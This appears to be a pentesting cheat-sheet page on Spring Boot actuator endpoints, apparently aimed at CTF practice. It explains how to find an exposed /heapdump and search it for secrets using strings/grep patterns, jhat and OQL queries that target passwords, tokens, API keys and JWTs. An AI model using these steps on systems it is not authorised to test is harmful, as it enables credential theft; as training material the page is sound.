📖 CyberBook

Appearance

Java - Spring Boot

Starting

bash
# Common Spring Boot Endpoints

## well-known
/metrics    # Shows metrics information for the current application
/heapdump   # JVM heap dump information (PASSWORD | ACCESS_KEY | ACCESS_TOKEN ...)
/dump       # Displays a dump of threads
/env        # Exposes properties from Spring's ConfigurableEnvironment

/autoconfig # Displays an auto-configuration report
/shutdown   # Shuts the application down (not enabled by default)
/pause      # Allows the application to be gracefully pause (not enabled by default)
/mappings   # Displays a collated list of all @RequestMapping paths
/trace      # Displays the last several HTTP messages

## Fuzzing - Seclists
/seclists/Discovery/Web-Content/Programming-Language-Specific/Java-Spring-Boot.txt

The goal is get the /heapdump endpoint, because in this memory area is store the sensitives data like :

  • PASSWORD, SECRET_KEYS, ACCESS_TOKEN, etc., can be stored.

Command for extracting data from a heapdump

bash
# Extracting the heapdump
tar -xvzf heapdump.tar.gz # Output : heapdump.hprof

Use commands like strings, grep to search for keywords related to sensitive data:

bash
## Research information
strings | grep -i -C 2 "password"
strings -e b heapdump.hprof | grep -in "password"
strings -e b heapdump.hprof | grep -in -E "flag|password|token|secret|key"
strings -e b heapdump.hprof | grep -Ei '^(JWT|TOKEN|API[_-]?KEY|SECRET|PASSWORD|PASS|DB[_-]?PASSWORD|SESSION[_-]?KEY)[ =:]'

Using jhat for heapdump analysis

bash
# Download OpenJDK 8 (The last version who support jhat)
wget https://github.com/adoptium/temurin8-binaries/releases/download/jdk8u392-b08/OpenJDK8U-jdk_x64_linux_hotspot_8u392b08.tar.gz
tar -xvzf OpenJDK8U-jdk_x64_linux_hotspot_8u392b08.tar.gz
cd jdk8u392-b08/bin

# Check if it's correctly installed
./jhat -version
bash
# Start jhat with the heapdump file
./jhat -p heapdump.hprof

# Or use more memory (4GB RAM) and a custom port
./jhat -port 7401 -J-Xmx4G ~/heapdump_rootme.hprof

# Then go to: http://localhost:7401/oql/ to perform OQL queries

Object Query Language (OQL) example

sql
-- Exemple of query used in Object Query Language
select s from java.lang.String s where s.toString().toLowerCase().contains("flag")

-- Query for strings containing any of these sensitive terms
select s from java.lang.String s where s.toString().toLowerCase().matches(".*(password|token|key|flag|secret).*")

Resources